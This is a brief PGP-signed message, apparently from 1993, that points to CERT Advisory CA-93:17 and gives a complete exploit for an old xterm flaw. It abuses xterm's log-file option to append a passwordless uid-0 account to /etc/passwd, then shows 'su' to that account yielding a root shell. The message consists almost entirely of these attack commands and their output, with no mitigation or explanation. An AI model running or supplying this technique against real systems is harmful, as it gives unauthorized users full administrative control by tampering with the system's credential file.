-----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-93:17 can be exploited with: % cat >! /tmp/fofo newroot::0:0:The New Superuser on the block:/:/bin/csh ^D % xterm -l -lf /etc/passwd -e cat /tmp/fofo % su newroot # whoami root # id uid=0(root) gid=0(wheel) -----BEGIN PGP SIGNATURE----- Version: 2.3a iQBVAgUBLOljqXynuL1gkffFAQHi5QH7Be2n60igPaE6wKKAb2oR188YTuDqOLku ltEBp7schLwVWi2YNfCP+CD1AKELvAzZ9jWzdsz+dvDW6ooMyU4bmg== =hBaZ -----END PGP SIGNATURE-----